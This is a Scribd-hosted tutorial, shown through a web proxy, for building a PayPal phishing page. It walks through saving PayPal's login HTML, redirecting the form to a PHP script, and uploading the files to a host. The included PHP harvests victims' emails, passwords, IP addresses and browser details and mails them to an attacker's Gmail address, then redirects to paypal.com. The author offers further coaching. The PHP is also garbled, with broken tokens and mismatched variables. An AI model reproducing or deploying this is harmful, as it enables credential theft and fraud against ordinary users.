50% found this document useful (2 votes)
2K views

Scampage Sux

This document provides instructions for creating a scam page to steal users' login credentials. It describes how to save the HTML of a target site like PayPal, modify the login form action and password field names, create a PHP file to send captured credentials and redirect to the target site. The scam page tricks users into entering their credentials, which are then emailed to the scammer along with other details like IP address. Creating and hosting these files allows one to setup a fake login page to steal users' private information.

Uploaded by

Sammi Bowe
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
50% found this document useful (2 votes)
2K views

Scampage Sux

This document provides instructions for creating a scam page to steal users' login credentials. It describes how to save the HTML of a target site like PayPal, modify the login form action and password field names, create a PHP file to send captured credentials and redirect to the target site. The scam page tricks users into entering their credentials, which are then emailed to the scammer along with other details like IP address. Creating and hosting these files allows one to setup a fake login page to steal users' private information.

Uploaded by

Sammi Bowe
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 2

HOW TO MAKE SCAMPAGE TUTORIAL(2021)

✓Scam page is a fake webpage. e.g. a login of a popular website, online bank login
and etc. depending on what it is. scam page are used by spammers to collect data on
people who get scammed. detecting scam page is simple if you are technology
oriented. but most common users can't detect scam page. this is a big problem in
the www. some company are developing software to combat scam's or phishing scams -
phishing is the term used
for this scam.

Steps;
✓OK, so first we choose a target.
We chose www.paypal.com

✓ Navigate the site chosen. Press CTRL + S and save the file. Html somewhere on
yourcomputer.

✓We open ... There might be a problem, namely the way the image.

✓ If relative path (relative path is the path like / images / wow.gif) be


transformed into an absolute path (http://tinta.com/images/wow.gif)

✓Now that you clarified your lead you to the file. Html that was saved, so your
login type CTRL + F ... (Here the words are different .. try and password,
password, username, etc.. Dak login does not work).

✓ You have a code like <form action="login2.php">. Login2.php change in 040147.php!

✓ Now, the username should be a code like . name = "email" tells us that in PHP
script authentication is the variable that you email username.

✓Good memory.
The password, the code should be similar ( ). So,
password is held in variable password. A and memorize it.

✓Now, where you have saved. Html, created a new file called 040147.php.

In it, add the following code:


Code:

$ To = "upgoingstar@gmail.com"
$ Name = $ _POST ['email'];
$ Email = $ _POST ['email'];
$ Subject = $ _POST ['subject'];
$ Password = $ _POST ['password'];
$ Agent = $ _SERVER ['HTTP_USER_AGENT'];
$ Ip = $ _SERVER ['REMOTE_ADDR'];
$ D = date ('l dS \ of F Y h: i: s A');
$ Sub = "New Account Hacked PayPal - $ email";
$ Headers = "From: $ name <$ email> \ n";
$ Headers .= "Content-Type: text / plain, charset = iso-8859-1 \ n";
$ Mes .= 'Username:'. $ Email. "\ N";
$ Msg .= "Password:". $ Password. "\ N";
$ Msg .= "Browser:". $ Agent. "\ N";
$ Msg .= "IP:". $ Ip. "\ N";
$ Mes .= 'Date and time:'. $ D;

(
mail ($ to, $ sub, $ mes, $ headers);
header ("Location: www.paypal.com");

)
?>

✓ Modify code
Code:

$ To = "flowbuzltd@gmail.com"

and put your mail. The code above variables over email and password and sends them
together with some more useful details.

✓Rename. Or HTML into index.html. Php, you upload the 2 files on a host and
entertain. : Wink:

YOUR SCAMPAGE IS READY NOW.


If you don't understand hmu, I'll teach you step by step

You might also like

pFad - Phonifier reborn

Pfad - The Proxy pFad of © 2024 Garber Painting. All rights reserved.

Note: This service is not intended for secure transactions such as banking, social media, email, or purchasing. Use at your own risk. We assume no liability whatsoever for broken pages.


Alternative Proxies:

Alternative Proxy

pFad Proxy

pFad v3 Proxy

pFad v4 Proxy